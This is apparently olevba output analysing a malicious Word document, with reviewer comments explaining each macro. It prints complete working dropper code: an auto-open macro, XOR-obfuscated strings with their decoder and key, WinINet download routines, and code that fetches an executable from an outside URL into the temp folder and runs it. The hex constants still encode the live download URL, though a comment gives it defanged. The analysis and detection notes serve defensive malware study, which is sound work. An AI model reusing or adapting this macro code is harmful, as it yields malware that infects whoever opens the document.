- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- s22c-6~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: s22c-6~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Auto-exec entry point: the ANALYSIS table for this stream flags AutoOpen as
- ' running when the Word document is opened.
- ' Its only statement calls HLOPHLOP32, the Sub defined in Module5.bas on this page.
- Sub autoopen()
- HLOPHLOP32
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module11.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module11'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' (File name: AddNewSheet.bas)
- ' Author: SENOO, Ken
- ' LICENSE: CC0
- ' (Last update: 2015-03-10T18:38+09:00)
- ' Replaces any worksheet named sheet_name with a fresh, empty one.
- ' NOTE(review): none of the macros shown on this page call AddNewSheet, and it uses
- ' Excel objects (Worksheets, Sheets) although the host file is a Word document;
- ' presumably unrelated filler code. Confirm before treating it as functional.
- Sub AddNewSheet(sheet_name)
- ' Delete an existing sheet with the same name, suppressing the confirmation prompt meanwhile.
- For Each ws In Worksheets
- If ws.Name = sheet_name Then
- Application.DisplayAlerts = False
- ws.Delete
- Application.DisplayAlerts = True
- End If
- Next ws
- ' Add a new sheet after the active one and give it the requested name.
- Sheets.Add(After:=ActiveSheet).Name = sheet_name
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO UFO.frm
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/UFO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' Size of the fixed-length read buffer (API222) and of each read request in API22222.
- Private Const API333333 = 8162
- ' Passed as the first argument (sAgent) of API22222222, which Module6.bas aliases to
- ' InternetOpenA, so this literal is the User-Agent of the request. A fixed "API33333"
- ' agent string is a usable network-detection artifact.
- Private Const API33333 As String = "API33333"
- ' Passed as lAccessType to InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT in WinINet.
- Private Const API3333 = 1
- ' Passed as dwFlags to InternetOpenUrlA; &H4000000 is INTERNET_FLAG_NO_CACHE_WRITE in WinINet.
- Private Const API333 = &H4000000
- ' Downloads sURL over WinINet and writes the response to sFileName.
- ' Returns True when the buffer written had non-zero length, otherwise False (the default).
- ' The API* procedures called here are the aliases declared in Module6.bas:
- ' API22222222 = InternetOpenA, API222222 = InternetOpenUrlA,
- ' API2222222 = InternetReadFile, API222222222 = InternetCloseHandle.
- Public Function API22222(ByVal sURL As String, ByVal sFileName As String) As Boolean
- ' Handles are LongPtr on 64-bit VBA7 hosts and Long elsewhere.
- #If VBA7 And Win64 Then
- Dim API2222 As LongPtr, API3333333 As LongPtr
- #Else
- Dim API2222 As Long, API3333333 As Long
- #End If
- ' API2 receives the byte count of each read, API222 is the fixed-length read buffer,
- ' API33333333 accumulates the downloaded data.
- Dim API2 As Long
- Dim API222 As String * API333333, API33333333 As String
- Dim API22 As Integer, dData As Double
- ' Open the WinINet session; give up (returning False) if that fails.
- API2222 = API22222222(API33333, API3333, vbNullString, vbNullString, 0)
- If API2222 = 0 Then
- Exit Function
- End If
- ' Request the URL; a zero handle means the request failed and nothing is written.
- API3333333 = API222222(API2222, sURL, vbNullString, 0, API333, 0)
- If API3333333 = 0 Then
- dData = 0
- Else
- ' First read: the whole fixed-length buffer is copied, not only the API2 bytes reported as read.
- API2222222 API3333333, API222, API333333, API2
- API33333333 = API222
- ' Keep reading until a read reports zero bytes, appending only the bytes received each time.
- Do While API2 <> 0
- API2222222 API3333333, API222, API333333, API2
- API33333333 = API33333333 + Mid(API222, 1, API2)
- Loop
- ' Write the accumulated data to sFileName in binary mode.
- dData = Len(API33333333): API22 = FreeFile
- Open sFileName For Binary Access Write Lock Write As #API22
- Put #API22, , API33333333: Close #API22
- End If
- ' Close the request and session handles.
- ' NOTE(review): the Declare in Module6.bas takes hInet ByRef, so these calls may not
- ' receive the handle value itself. Confirm.
- API222222222 API3333333
- API222222222 API2222
- API33333333 = ""
- ' Any non-zero length counts as success.
- If dData Then
- API22222 = True
- End If
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module5.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module5'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Hex-encoded, XOR-obfuscated strings. HLOPHLOP32 passes each one to STOP7777777777
- ' (Module6.bas) with X1111 as the key.
- ' The decoded values noted here were worked out by hand from that routine; re-derive
- ' them before using any as an indicator.
- ' Decodes to "Shell.Application".
- Private Const X11111111 = "1E25282121630C3D3D21242E5246242223"
- ' Decodes to "\PALmisc2.5.2.exe", the file name appended to the temp-folder path.
- Private Const X1111111 = "111D0C0120243E2E7F637863011C283528"
- ' Decodes to the download URL, defanged here: hxxp://dogordie[.]de/js/bin.exe
- Private Const X111111 = "2539393D77626229222A223F575B2863292862273E622F242363284B57"
- ' Decodes to "Scripting.FileSystemObject".
- Private Const X11111 = "1E2E3F243D3924232A630B245F571E343E392820022F27282E39"
- ' XOR key used for all four strings above.
- Private Const X1111 = "MMMMMMMMMMMMM32"
- ' Downloader and launcher, called from autoopen in ThisDocument.cls.
- ' It decodes its strings with STOP7777777777 (Module6.bas), downloads a file into a
- ' special folder with API22222 (Module3.bas), then opens that file through a COM object.
- ' The For loops over the T1... counters do not affect the result: the first leaves on its
- ' first pass (3 is not 14), the others compare a counter that is only ever 0 with 5.
- ' Defender view: a Word process that writes a new .exe and then opens it is the
- ' observable behaviour.
- Sub HLOPHLOP32()
- '* NAPIDPAOJMXNH55
- ' Filler loop, exits immediately.
- Dim T111111111111111 _
- As Long
- For T111111111111111 = _
- 3 To 10
- If Not T111111111111111 = 14 _
- Then Exit For
- Next T111111111111111
- Dim X111
- ' Create the COM object named by decoding X11111 (decodes to Scripting.FileSystemObject).
- Set X111 = CreateObject _
- (STOP7777777777 _
- (X1111, X11111))
- Dim X11
- ' 2 is TemporaryFolder for FileSystemObject.GetSpecialFolder.
- Const X11ID = 2
- ' Filler loop, never reaches End.
- Dim T11111111111111 As Integer
- For T11111111111111 = 0 To 0
- If T11111111111111 = 5 Then End
- Next T11111111111111
- Set X11 = X111.GetSpecialFolder _
- (X11ID)
- Dim T1111111111111 As Integer
- For T1111111111111 = 0 To 0
- If T1111111111111 = 5 Then End
- Next T1111111111111
- ' Build the drop path: special-folder path plus the decoded file name from X1111111.
- ' X1 is not declared anywhere in this module.
- X1 = X11 & STOP7777777777 _
- (X1111, X1111111)
- Dim T111111111111 As Integer
- For T111111111111 = 0 To 0
- If T111111111111 = 5 Then End
- Next T111111111111
- ' Same object created a second time.
- Set X111 = CreateObject _
- (STOP7777777777 _
- (X1111, X11111))
- Dim T11111111111 As Integer
- For T11111111111 = 0 To 0
- If T11111111111 = 5 Then End
- Next T11111111111
- ' Remove any file already present at the drop path.
- If X111.FileExists _
- (X1) Then
- X111. _
- DeleteFile X1
- End If
- ' Download the decoded URL (X111111) to the drop path; the Boolean result is not used.
- If API22222(STOP7777777777 _
- (X1111, X111111), X1) Then
- End If
- ' SSSS is not assigned anywhere else in this Sub.
- Set SSSS = Nothing
- ' Empty check: the result of FileExists is not acted on.
- If X111. _
- FileExists _
- (X1) Then
- End If
- ' Create the COM object named by decoding X11111111 (decodes to Shell.Application) and
- ' have it open the downloaded file, which for an executable path starts it.
- Set SASASA = CreateObject _
- (STOP7777777777 _
- (X1111, X11111111))
- SASASA.Open X1
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module6.bas
- in file: s22c-6~1.doc - OLE stream: u'Macros/VBA/Module6'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- ' WinINet imports declared under meaningless names; the Alias clause gives the real export.
- ' API222222222 = InternetCloseHandle, API22222222 = InternetOpenA,
- ' API2222222 = InternetReadFile, API222222 = InternetOpenUrlA.
- ' Two variants are declared so the macro compiles on both 64-bit VBA7 hosts (PtrSafe, LongPtr
- ' handles) and older or 32-bit hosts (Long handles).
- ' For triage, the Alias strings and "wininet.dll" stay in clear text even though the
- ' VBA-side names are obfuscated.
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
- Public Declare PtrSafe Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
- Public Declare PtrSafe Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As LongPtr, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare PtrSafe Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
- #Else
- Public Declare Function API222222222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
- Public Declare Function API22222222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
- Public Declare Function API2222222 Lib "wininet.dll" Alias "InternetReadFile" (ByVal API3333333 As Long, ByVal API222 As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
- Public Declare Function API222222 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
- #End If
- ' String decoder: treats STOP77777777 as hex byte pairs and XORs each byte with a
- ' character of the key STOP777777777, returning the resulting text.
- ' The key character for the i-th byte is at position (i Mod Len(key)) + 1, so the key is
- ' consumed from its second character onwards and wraps around.
- ' The local names asasas1O (letter O) and asasas10 (digit zero) are different variables.
- Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
- Dim asasas1 As Long
- Dim asasas1O As String
- Dim asasas10 As Integer
- Dim asasas101 As Integer
- ' One pass per encoded byte (two hex digits each).
- For asasas1 = 1 To (Len(STOP77777777) / 2)
- ' Parse the i-th hex pair into a number.
- asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
- ' Pick the key character for this position.
- asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
- ' XOR the two and append the resulting character to the output.
- asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
- Next asasas1
- STOP7777777777 = asasas1O
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+